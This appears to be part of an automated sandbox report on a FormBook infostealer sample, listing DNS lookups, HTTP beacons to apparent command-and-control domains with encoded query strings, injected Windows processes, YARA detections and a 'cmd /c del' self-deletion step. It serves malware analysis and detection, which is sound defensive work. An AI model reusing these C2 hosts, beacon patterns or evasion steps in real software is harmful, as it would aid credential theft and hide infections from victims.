                                                              Sep 15, 2021 10:40:34.879271030 CEST | 8.8.8.8 | 192.168.2.7 | 0x5287 | No error (0) | www.munortiete.com | - | 104.21.71.167 | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:45.377986908 CEST | 8.8.8.8 | 192.168.2.7 | 0x14a0 | No error (0) | www.438451.com | - | 160.202.170.147 | A (IP address) | IN (0x0001)
                                                              Sep 15, 2021 10:40:51.148735046 CEST | 8.8.8.8 | 192.168.2.7 | 0xc584 | Name error (3) | www.fanpaixiu.xyz | none | none | A (IP address) | IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • www.indianadogeavaxsite.site
                                                              • www.munortiete.com

                                                              HTTP Packets

                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              0 | 192.168.2.7 | 49809 | 54.194.41.141 | 80 | C:\Windows\explorer.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Sep 15, 2021 10:40:22.916647911 CEST | 6201 | OUT | GET /t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn HTTP/1.1
                                                              Host: www.indianadogeavaxsite.site
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Sep 15, 2021 10:40:22.963691950 CEST | 6201 | IN | HTTP/1.1 403 Forbidden
                                                              Server: nginx
                                                              Date: Wed, 15 Sep 2021 08:40:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 118
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              1 | 192.168.2.7 | 49810 | 172.67.147.111 | 80 | C:\Windows\explorer.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Sep 15, 2021 10:40:34.909507036 CEST | 6203 | OUT | GET /t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn HTTP/1.1
                                                              Host: www.munortiete.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Sep 15, 2021 10:40:34.941842079 CEST | 6204 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 15 Sep 2021 08:40:34 GMT
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Wed, 15 Sep 2021 09:40:34 GMT
                                                              Location: https://www.munortiete.com/t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tf19gfgwC210LIACe1vV29u1H4wndpzEQechmp6W8NM%2F%2BBin2oGR1mlmAEeHy867OF7b8VWH9BEaP2fn4MX%2Bi29fIOkrR25WYxU0SDHleBOTosji4XBUZ%2Bk08tOt9qjCq1Gz6as%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 68f08d124ee7d6b5-FRA
                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Behavior

                                                              System Behavior

                                                              General

                                                              Start time: 10:38:35
                                                              Start date: 15/09/2021
                                                              Path: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe
                                                              Wow64 process (32bit): true
                                                              Commandline: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe'
                                                              Imagebase: 0xcd0000
                                                              File size: 671232 bytes
                                                              MD5 hash: CE556CE97EA23CBC2940F2AAD45D468F
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: .Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation: low

                                                              General

                                                              Start time: 10:38:49
                                                              Start date: 15/09/2021
                                                              Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Wow64 process (32bit): false
                                                              Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Imagebase: 0x410000
                                                              File size: 45152 bytes
                                                              MD5 hash: 2867A3817C9245F7CF518524DFD18F28
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: C, C++ or other language
                                                              Reputation: high

                                                              General

                                                              Start time: 10:38:50
                                                              Start date: 15/09/2021
                                                              Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Wow64 process (32bit): true
                                                              Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Imagebase: 0x470000
                                                              File size: 45152 bytes
                                                              MD5 hash: 2867A3817C9245F7CF518524DFD18F28
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation: high

                                                              General

                                                              Start time: 10:38:55
                                                              Start date: 15/09/2021
                                                              Path: C:\Windows\explorer.exe
                                                              Wow64 process (32bit): false
                                                              Commandline: C:\Windows\Explorer.EXE
                                                              Imagebase: 0x7ff662bf0000
                                                              File size: 3933184 bytes
                                                              MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation: high

                                                              General

                                                              Start time: 10:39:43
                                                              Start date: 15/09/2021
                                                              Path: C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit): true
                                                              Commandline: C:\Windows\SysWOW64\cmd.exe
                                                              Imagebase: 0x870000
                                                              File size: 232960 bytes
                                                              MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation: high

                                                              General

                                                              Start time: 10:39:45
                                                              Start date: 15/09/2021
                                                              Path: C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit): true
                                                              Commandline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                              Imagebase: 0x870000
                                                              File size: 232960 bytes
                                                              MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: C, C++ or other language
                                                              Reputation: high

                                                              General

                                                              Start time: 10:39:46
                                                              Start date: 15/09/2021
                                                              Path: C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit): false
                                                              Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase: 0x7ff774ee0000
                                                              File size: 625664 bytes
                                                              MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: C, C++ or other language
                                                              Reputation: high
